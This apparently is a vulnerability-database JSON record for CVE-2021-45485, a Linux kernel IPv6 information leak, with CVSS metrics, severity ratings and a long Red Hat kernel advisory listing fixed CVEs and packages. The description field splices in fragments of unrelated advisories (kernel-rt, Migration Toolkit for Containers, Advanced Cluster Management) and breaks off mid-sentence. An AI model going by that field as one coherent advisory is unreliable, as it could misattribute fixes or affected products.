          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2021-45485",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2021-45485",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202112-2265",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-409116",
            "trust": 0.1,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2021-45485",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-409116"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-45485"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-017434"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202112-2265"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-45485"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "In the IPv6 implementation in the Linux kernel before 5.13.3, net/ipv6/output_core.c has an information leak because of certain use of a hash table which, although big, doesn\u0027t properly consider that IPv6-based attackers can typically choose among many IPv6 source addresses. Linux Kernel Exists in the use of cryptographic algorithms.Information may be obtained. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: kernel security, bug fix, and enhancement update\nAdvisory ID:       RHSA-2022:1988-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2022:1988\nIssue date:        2022-05-10\nCVE Names:         CVE-2020-0404 CVE-2020-4788 CVE-2020-13974 \n                   CVE-2020-27820 CVE-2021-0941 CVE-2021-3612 \n                   CVE-2021-3669 CVE-2021-3743 CVE-2021-3744 \n                   CVE-2021-3752 CVE-2021-3759 CVE-2021-3764 \n                   CVE-2021-3772 CVE-2021-3773 CVE-2021-4002 \n                   CVE-2021-4037 CVE-2021-4083 CVE-2021-4157 \n                   CVE-2021-4197 CVE-2021-4203 CVE-2021-20322 \n                   CVE-2021-21781 CVE-2021-26401 CVE-2021-29154 \n                   CVE-2021-37159 CVE-2021-41864 CVE-2021-42739 \n                   CVE-2021-43056 CVE-2021-43389 CVE-2021-43976 \n                   CVE-2021-44733 CVE-2021-45485 CVE-2021-45486 \n                   CVE-2022-0001 CVE-2022-0002 CVE-2022-0286 \n                   CVE-2022-0322 CVE-2022-1011 \n=====================================================================\n\n1. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat CodeReady Linux Builder (v. 8) - aarch64, ppc64le, x86_64\nRed Hat Enterprise Linux BaseOS (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64\n\n3. \n\nSecurity Fix(es):\n\n* kernel: fget: check that the fd still exists after getting a ref to it\n(CVE-2021-4083)\n\n* kernel: avoid cyclic entity chains due to malformed USB descriptors\n(CVE-2020-0404)\n\n* kernel: speculation on incompletely validated data on IBM Power9\n(CVE-2020-4788)\n\n* kernel: integer overflow in k_ascii() in drivers/tty/vt/keyboard.c\n(CVE-2020-13974)\n\n* kernel: out-of-bounds read in bpf_skb_change_head() of filter.c due to a\nuse-after-free (CVE-2021-0941)\n\n* kernel: joydev: zero size passed to joydev_handle_JSIOCSBTNMAP()\n(CVE-2021-3612)\n\n* kernel: reading /proc/sysvipc/shm does not scale with large shared memory\nsegment counts (CVE-2021-3669)\n\n* kernel: out-of-bound Read in qrtr_endpoint_post in net/qrtr/qrtr.c\n(CVE-2021-3743)\n\n* kernel: crypto: ccp - fix resource leaks in ccp_run_aes_gcm_cmd()\n(CVE-2021-3744)\n\n* kernel: possible use-after-free in bluetooth module (CVE-2021-3752)\n\n* kernel: unaccounted ipc objects in Linux kernel lead to breaking memcg\nlimits and DoS attacks (CVE-2021-3759)\n\n* kernel: DoS in ccp_run_aes_gcm_cmd() function (CVE-2021-3764)\n\n* kernel: sctp: Invalid chunks may be used to remotely remove existing\nassociations (CVE-2021-3772)\n\n* kernel: lack of port sanity checking in natd and netfilter leads to\nexploit of OpenVPN clients (CVE-2021-3773)\n\n* kernel: possible leak or coruption of data residing on hugetlbfs\n(CVE-2021-4002)\n\n* kernel: security regression for CVE-2018-13405 (CVE-2021-4037)\n\n* kernel: Buffer overwrite in decode_nfs_fh function (CVE-2021-4157)\n\n* kernel: cgroup: Use open-time creds and namespace for migration perm\nchecks (CVE-2021-4197)\n\n* kernel: Race condition in races in sk_peer_pid and sk_peer_cred accesses\n(CVE-2021-4203)\n\n* kernel: new DNS Cache Poisoning Attack based on ICMP fragment needed\npackets replies (CVE-2021-20322)\n\n* kernel: arm: SIGPAGE information disclosure vulnerability\n(CVE-2021-21781)\n\n* hw: cpu: LFENCE/JMP Mitigation Update for CVE-2017-5715 (CVE-2021-26401)\n\n* kernel: Local privilege escalation due to incorrect BPF JIT branch\ndisplacement computation (CVE-2021-29154)\n\n* kernel: use-after-free in hso_free_net_device() in drivers/net/usb/hso.c\n(CVE-2021-37159)\n\n* kernel: eBPF multiplication integer overflow in\nprealloc_elems_and_freelist() in kernel/bpf/stackmap.c leads to\nout-of-bounds write (CVE-2021-41864)\n\n* kernel: Heap buffer overflow in firedtv driver (CVE-2021-42739)\n\n* kernel: ppc: kvm: allows a malicious KVM guest to crash the host\n(CVE-2021-43056)\n\n* kernel: an array-index-out-bounds in detach_capi_ctr in\ndrivers/isdn/capi/kcapi.c (CVE-2021-43389)\n\n* kernel: mwifiex_usb_recv() in drivers/net/wireless/marvell/mwifiex/usb.c\nallows an attacker to cause DoS via crafted USB device (CVE-2021-43976)\n\n* kernel: use-after-free in the TEE subsystem (CVE-2021-44733)\n\n* kernel: information leak in the IPv6 implementation (CVE-2021-45485)\n\n* kernel: information leak in the IPv4 implementation (CVE-2021-45486)\n\n* hw: cpu: intel: Branch History Injection (BHI) (CVE-2022-0001)\n\n* hw: cpu: intel: Intra-Mode BTI (CVE-2022-0002)\n\n* kernel: Local denial of service in bond_ipsec_add_sa (CVE-2022-0286)\n\n* kernel: DoS in sctp_addto_chunk in net/sctp/sm_make_chunk.c\n(CVE-2022-0322)\n\n* kernel: FUSE allows UAF reads of write() buffers, allowing theft of\n(partial) /etc/shadow hashes (CVE-2022-1011)\n\n* kernel: use-after-free in nouveau kernel module (CVE-2020-27820)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 8.6 Release Notes linked from the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1888433 - CVE-2020-4788 kernel: speculation on incompletely validated data on IBM Power9\n1901726 - CVE-2020-27820 kernel: use-after-free in nouveau kernel module\n1919791 - CVE-2020-0404 kernel: avoid cyclic entity chains due to malformed USB descriptors\n1946684 - CVE-2021-29154 kernel: Local privilege escalation due to incorrect BPF JIT branch displacement computation\n1951739 - CVE-2021-42739 kernel: Heap buffer overflow in firedtv driver\n1957375 - [RFE] x86, tsc: Add kcmdline args for skipping tsc calibration sequences\n1974079 - CVE-2021-3612 kernel: joydev: zero size passed to joydev_handle_JSIOCSBTNMAP()\n1981950 - CVE-2021-21781 kernel: arm: SIGPAGE information disclosure vulnerability\n1983894 - Hostnetwork pod to service backed by hostnetwork on the same node is not working with OVN Kubernetes\n1985353 - CVE-2021-37159 kernel: use-after-free in hso_free_net_device() in drivers/net/usb/hso.c\n1986473 - CVE-2021-3669 kernel: reading /proc/sysvipc/shm does not scale with large shared memory segment counts\n1994390 - FIPS: deadlock between PID 1 and \"modprobe crypto-jitterentropy_rng\" at boot, preventing system to boot\n1997338 - block: update to upstream v5.14\n1997467 - CVE-2021-3764 kernel: DoS in ccp_run_aes_gcm_cmd() function\n1997961 - CVE-2021-3743 kernel: out-of-bound Read in qrtr_endpoint_post in net/qrtr/qrtr.c\n1999544 - CVE-2021-3752 kernel: possible use-after-free in bluetooth module\n1999675 - CVE-2021-3759 kernel: unaccounted ipc objects in Linux kernel lead to breaking memcg limits and DoS attacks\n2000627 - CVE-2021-3744 kernel: crypto: ccp - fix resource leaks in ccp_run_aes_gcm_cmd()\n2000694 - CVE-2021-3772 kernel: sctp: Invalid chunks may be used to remotely remove existing associations\n2004949 - CVE-2021-3773 kernel: lack of port sanity checking in natd and netfilter leads to exploit of OpenVPN clients\n2009312 - Incorrect system time reported by the cpu guest statistics (PPC only). \n2009521 - XFS: sync to upstream v5.11\n2010463 - CVE-2021-41864 kernel: eBPF multiplication integer overflow in prealloc_elems_and_freelist() in kernel/bpf/stackmap.c leads to out-of-bounds write\n2011104 - statfs reports wrong free space for small quotas\n2013180 - CVE-2021-43389 kernel: an array-index-out-bounds in detach_capi_ctr in drivers/isdn/capi/kcapi.c\n2014230 - CVE-2021-20322 kernel: new DNS Cache Poisoning Attack based on ICMP fragment needed packets replies\n2015525 - SCTP peel-off with SELinux and containers in OCP\n2015755 - zram: zram leak with warning when running zram02.sh in ltp\n2016169 - CVE-2020-13974 kernel: integer overflow in k_ascii() in drivers/tty/vt/keyboard.c\n2017073 - CVE-2021-43056 kernel: ppc: kvm: allows a malicious KVM guest to crash the host\n2017796 - ceph omnibus backport for RHEL-8.6.0\n2018205 - CVE-2021-0941 kernel: out-of-bounds read in bpf_skb_change_head() of filter.c due to a use-after-free\n2022814 - Rebase the input and HID stack in 8.6 to v5.15\n2025003 - CVE-2021-43976 kernel: mwifiex_usb_recv() in drivers/net/wireless/marvell/mwifiex/usb.c allows an attacker to cause DoS via crafted USB device\n2025726 - CVE-2021-4002 kernel: possible leak or coruption of data residing on hugetlbfs\n2027239 - CVE-2021-4037 kernel: security regression for CVE-2018-13405\n2029923 - CVE-2021-4083 kernel: fget: check that the fd still exists after getting a ref to it\n2030476 - Kernel 4.18.0-348.2.1 secpath_cache memory leak involving strongswan tunnel\n2030747 - CVE-2021-44733 kernel: use-after-free in the TEE subsystem\n2031200 - rename(2) fails on subfolder mounts when the share path has a trailing slash\n2034342 - CVE-2021-4157 kernel: Buffer overwrite in decode_nfs_fh function\n2035652 - CVE-2021-4197 kernel: cgroup: Use open-time creds and namespace for migration perm checks\n2036934 - CVE-2021-4203 kernel: Race condition in races in sk_peer_pid and sk_peer_cred accesses\n2037019 - CVE-2022-0286 kernel: Local denial of service in bond_ipsec_add_sa\n2039911 - CVE-2021-45485 kernel: information leak in the IPv6 implementation\n2039914 - CVE-2021-45486 kernel: information leak in the IPv4 implementation\n2042798 - [RHEL8.6][sfc] General sfc driver update\n2042822 - CVE-2022-0322 kernel: DoS in sctp_addto_chunk in net/sctp/sm_make_chunk.c\n2043453 - [RHEL8.6 wireless] stack \u0026 drivers general update to v5.16+\n2046021 - kernel 4.18.0-358.el8 async dirops causes write errors with namespace restricted caps\n2048251 - Selinux  is not  allowing SCTP connection setup between inter pod communication in enforcing mode\n2061700 - CVE-2021-26401 hw: cpu: LFENCE/JMP Mitigation Update for CVE-2017-5715\n2061712 - CVE-2022-0001 hw: cpu: intel: Branch History Injection (BHI)\n2061721 - CVE-2022-0002 hw: cpu: intel: Intra-Mode BTI\n2064855 - CVE-2022-1011 kernel: FUSE allows UAF reads of write() buffers, allowing theft of (partial) /etc/shadow hashes\n\n6. Package List:\n\nRed Hat Enterprise Linux BaseOS (v. 8):\n\nSource:\nkernel-4.18.0-372.9.1.el8.src.rpm\n\naarch64:\nbpftool-4.18.0-372.9.1.el8.aarch64.rpm\nbpftool-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-core-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-cross-headers-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-debug-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-debug-core-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-debug-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-debug-devel-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-debug-modules-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-debug-modules-extra-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-debuginfo-common-aarch64-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-devel-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-headers-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-modules-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-modules-extra-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-tools-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-tools-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-tools-libs-4.18.0-372.9.1.el8.aarch64.rpm\nperf-4.18.0-372.9.1.el8.aarch64.rpm\nperf-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm\npython3-perf-4.18.0-372.9.1.el8.aarch64.rpm\npython3-perf-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm\n\nnoarch:\nkernel-abi-stablelists-4.18.0-372.9.1.el8.noarch.rpm\nkernel-doc-4.18.0-372.9.1.el8.noarch.rpm\n\nppc64le:\nbpftool-4.18.0-372.9.1.el8.ppc64le.rpm\nbpftool-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-core-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-cross-headers-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-debug-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-debug-core-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-debug-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-debug-devel-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-debug-modules-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-debug-modules-extra-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-devel-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-headers-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-modules-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-modules-extra-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-tools-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-tools-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-tools-libs-4.18.0-372.9.1.el8.ppc64le.rpm\nperf-4.18.0-372.9.1.el8.ppc64le.rpm\nperf-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm\npython3-perf-4.18.0-372.9.1.el8.ppc64le.rpm\npython3-perf-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm\n\ns390x:\nbpftool-4.18.0-372.9.1.el8.s390x.rpm\nbpftool-debuginfo-4.18.0-372.9.1.el8.s390x.rpm\nkernel-4.18.0-372.9.1.el8.s390x.rpm\nkernel-core-4.18.0-372.9.1.el8.s390x.rpm\nkernel-cross-headers-4.18.0-372.9.1.el8.s390x.rpm\nkernel-debug-4.18.0-372.9.1.el8.s390x.rpm\nkernel-debug-core-4.18.0-372.9.1.el8.s390x.rpm\nkernel-debug-debuginfo-4.18.0-372.9.1.el8.s390x.rpm\nkernel-debug-devel-4.18.0-372.9.1.el8.s390x.rpm\nkernel-debug-modules-4.18.0-372.9.1.el8.s390x.rpm\nkernel-debug-modules-extra-4.18.0-372.9.1.el8.s390x.rpm\nkernel-debuginfo-4.18.0-372.9.1.el8.s390x.rpm\nkernel-debuginfo-common-s390x-4.18.0-372.9.1.el8.s390x.rpm\nkernel-devel-4.18.0-372.9.1.el8.s390x.rpm\nkernel-headers-4.18.0-372.9.1.el8.s390x.rpm\nkernel-modules-4.18.0-372.9.1.el8.s390x.rpm\nkernel-modules-extra-4.18.0-372.9.1.el8.s390x.rpm\nkernel-tools-4.18.0-372.9.1.el8.s390x.rpm\nkernel-tools-debuginfo-4.18.0-372.9.1.el8.s390x.rpm\nkernel-zfcpdump-4.18.0-372.9.1.el8.s390x.rpm\nkernel-zfcpdump-core-4.18.0-372.9.1.el8.s390x.rpm\nkernel-zfcpdump-debuginfo-4.18.0-372.9.1.el8.s390x.rpm\nkernel-zfcpdump-devel-4.18.0-372.9.1.el8.s390x.rpm\nkernel-zfcpdump-modules-4.18.0-372.9.1.el8.s390x.rpm\nkernel-zfcpdump-modules-extra-4.18.0-372.9.1.el8.s390x.rpm\nperf-4.18.0-372.9.1.el8.s390x.rpm\nperf-debuginfo-4.18.0-372.9.1.el8.s390x.rpm\npython3-perf-4.18.0-372.9.1.el8.s390x.rpm\npython3-perf-debuginfo-4.18.0-372.9.1.el8.s390x.rpm\n\nx86_64:\nbpftool-4.18.0-372.9.1.el8.x86_64.rpm\nbpftool-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-core-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-cross-headers-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-debug-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-debug-core-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-debug-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-debug-devel-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-debug-modules-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-debug-modules-extra-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-debuginfo-common-x86_64-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-devel-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-headers-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-modules-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-modules-extra-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-tools-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-tools-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-tools-libs-4.18.0-372.9.1.el8.x86_64.rpm\nperf-4.18.0-372.9.1.el8.x86_64.rpm\nperf-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm\npython3-perf-4.18.0-372.9.1.el8.x86_64.rpm\npython3-perf-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm\n\nRed Hat CodeReady Linux Builder (v. 8):\n\naarch64:\nbpftool-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-debug-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-debuginfo-common-aarch64-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-tools-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm\nkernel-tools-libs-devel-4.18.0-372.9.1.el8.aarch64.rpm\nperf-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm\npython3-perf-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm\n\nppc64le:\nbpftool-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-debug-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-tools-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm\nkernel-tools-libs-devel-4.18.0-372.9.1.el8.ppc64le.rpm\nperf-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm\npython3-perf-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm\n\nx86_64:\nbpftool-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-debug-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-debuginfo-common-x86_64-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-tools-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm\nkernel-tools-libs-devel-4.18.0-372.9.1.el8.x86_64.rpm\nperf-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm\npython3-perf-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2020-0404\nhttps://access.redhat.com/security/cve/CVE-2020-4788\nhttps://access.redhat.com/security/cve/CVE-2020-13974\nhttps://access.redhat.com/security/cve/CVE-2020-27820\nhttps://access.redhat.com/security/cve/CVE-2021-0941\nhttps://access.redhat.com/security/cve/CVE-2021-3612\nhttps://access.redhat.com/security/cve/CVE-2021-3669\nhttps://access.redhat.com/security/cve/CVE-2021-3743\nhttps://access.redhat.com/security/cve/CVE-2021-3744\nhttps://access.redhat.com/security/cve/CVE-2021-3752\nhttps://access.redhat.com/security/cve/CVE-2021-3759\nhttps://access.redhat.com/security/cve/CVE-2021-3764\nhttps://access.redhat.com/security/cve/CVE-2021-3772\nhttps://access.redhat.com/security/cve/CVE-2021-3773\nhttps://access.redhat.com/security/cve/CVE-2021-4002\nhttps://access.redhat.com/security/cve/CVE-2021-4037\nhttps://access.redhat.com/security/cve/CVE-2021-4083\nhttps://access.redhat.com/security/cve/CVE-2021-4157\nhttps://access.redhat.com/security/cve/CVE-2021-4197\nhttps://access.redhat.com/security/cve/CVE-2021-4203\nhttps://access.redhat.com/security/cve/CVE-2021-20322\nhttps://access.redhat.com/security/cve/CVE-2021-21781\nhttps://access.redhat.com/security/cve/CVE-2021-26401\nhttps://access.redhat.com/security/cve/CVE-2021-29154\nhttps://access.redhat.com/security/cve/CVE-2021-37159\nhttps://access.redhat.com/security/cve/CVE-2021-41864\nhttps://access.redhat.com/security/cve/CVE-2021-42739\nhttps://access.redhat.com/security/cve/CVE-2021-43056\nhttps://access.redhat.com/security/cve/CVE-2021-43389\nhttps://access.redhat.com/security/cve/CVE-2021-43976\nhttps://access.redhat.com/security/cve/CVE-2021-44733\nhttps://access.redhat.com/security/cve/CVE-2021-45485\nhttps://access.redhat.com/security/cve/CVE-2021-45486\nhttps://access.redhat.com/security/cve/CVE-2022-0001\nhttps://access.redhat.com/security/cve/CVE-2022-0002\nhttps://access.redhat.com/security/cve/CVE-2022-0286\nhttps://access.redhat.com/security/cve/CVE-2022-0322\nhttps://access.redhat.com/security/cve/CVE-2022-1011\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.6_release_notes/\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYnqSF9zjgjWX9erEAQjBXQ/8DSpFUMNN6ZVFtli2KuVowVLS+14J0jtj\n0zxpr0skJT8vVulU3VTeURBMdg9NAo9bj3R5KTk2+dC+AMuHET5aoVvaYmimBGKL\n5qzpu7q9Z0aaD2I288suHCnYuRJnt+qKZtNa4hlcY92bN0tcYBonxsdIS2xM6xIu\nGHNS8HNVUNz4PuCBfmbITvgX9Qx+iZQVlVccDBG5LDpVwgOtnrxHKbe5E499v/9M\noVoN+eV9ulHAZdCHWlUAahbsvEqDraCKNT0nHq/xO5dprPjAcjeKYMeaICtblRr8\nk+IouGywaN+mW4sBjnaaiuw2eAtoXq/wHisX1iUdNkroqcx9NBshWMDBJnE4sxQJ\nZOSc8B6yjJItPvUI7eD3BDgoka/mdoyXTrg+9VRrir6vfDHPrFySLDrO1O5HM5fO\n3sExCVO2VM7QMCGHJ1zXXX4szk4SV/PRsjEesvHOyR2xTKZZWMsXe1h9gYslbADd\ntW0yco/G23xjxqOtMKuM/nShBChflMy9apssldiOfdqODJMv5d4rRpt0xgmtSOM6\nqReveuQCasmNrGlAHgDwbtWz01fmSuk9eYDhZNmHA3gxhoHIV/y+wr0CLbOQtDxT\np79nhiqwUo5VMj/X30Lu0Wl3ptLuhRWamzTCkEEzdubr8aVsT4RRNQU3KfVFfpT1\nMWp/2ui3i80=\n=Fdgy\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. 8) - x86_64\n\n3. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. Summary:\n\nThe Migration Toolkit for Containers (MTC) 1.7.2 is now available. Description:\n\nThe Migration Toolkit for Containers (MTC) enables you to migrate\nKubernetes resources, persistent volume data, and internal container images\nbetween OpenShift Container Platform clusters, using the MTC web console or\nthe Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):\n\n2007557 - CVE-2021-3807 nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes\n2038898 - [UI] ?Update Repository? option not getting disabled after adding the Replication Repository details to the MTC web console\n2040693 - ?Replication repository? wizard has no validation for name length\n2040695 - [MTC UI] ?Add Cluster? wizard stucks when the cluster name length is more than 63 characters\n2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor\n2048537 - Exposed route host to image registry? connecting successfully to invalid registry ?xyz.com?\n2053259 - CVE-2022-0536 follow-redirects: Exposure of Sensitive Information via Authorization Header leak\n2055658 - [MTC UI] Cancel button on ?Migrations? page does not disappear when migration gets Failed/Succeeded with warnings\n2056962 - [MTC UI] UI shows the wrong migration type info after changing the target namespace\n2058172 - [MTC UI] Successful Rollback is not showing the green success icon in the ?Last State? field. \n2058529 - [MTC UI] Migrations Plan is missing the type for the state migration performed before upgrade\n2061335 - [MTC UI] ?Update cluster? button is not getting disabled\n2062266 - MTC UI does not display logs properly [OADP-BL]\n2062862 - [MTC UI] Clusters page behaving unexpectedly on deleting the remote cluster?s service account secret from backend\n2074675 - HPAs of DeploymentConfigs are not being updated when migration from Openshift 3.x to Openshift 4.x\n2076593 - Velero pod log missing from UI  drop down\n2076599 - Velero pod log missing from downloaded logs folder [OADP-BL]\n2078459 - [MTC UI] Storageclass conversion plan is adding migstorage reference in migplan\n2079252 - [MTC]  Rsync options logs not visible in log-reader pod\n2082221 - Don\u0027t allow Storage class conversion migration if source cluster has only one storage class defined [UI]\n2082225 - non-numeric user when launching stage pods [OADP-BL]\n2088022 - Default CPU requests on Velero/Restic are too demanding making scheduling fail in certain environments\n2088026 - Cloud propagation phase in migration controller is not doing anything due to missing labels on Velero pods\n2089126 - [MTC] Migration controller cannot find Velero Pod because of wrong labels\n2089411 - [MTC] Log reader pod is missing velero and restic pod logs [OADP-BL]\n2089859 - [Crane] DPA CR is missing the required flag - Migration is getting failed at the EnsureCloudSecretPropagated phase due to the missing secret VolumeMounts\n2090317 - [MTC] mig-operator failed to create a DPA CR due to null values are passed instead of int [OADP-BL]\n2096939 - Fix legacy operator.yml inconsistencies and errors\n2100486 - [MTC UI] Target storage class field is not getting respected when clusters don\u0027t have replication repo configured. Description:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.5.0 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in. See\nthe following Release Notes documentation, which will be updated shortly\nfor this release, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.5/html/release_notes/\n\nSecurity fixes: \n\n* nodejs-json-schema: Prototype pollution vulnerability (CVE-2021-3918)\n\n* containerd: Unprivileged pod may bind mount any privileged regular file\non disk (CVE-2021-43816)\n\n* minio: user privilege escalation in AddUser() admin API (CVE-2021-43858)\n\n* openssl: Infinite loop in BN_mod_sqrt() reachable when parsing\ncertificates (CVE-2022-0778)\n\n* imgcrypt: Unauthorized access to encryted container image on a 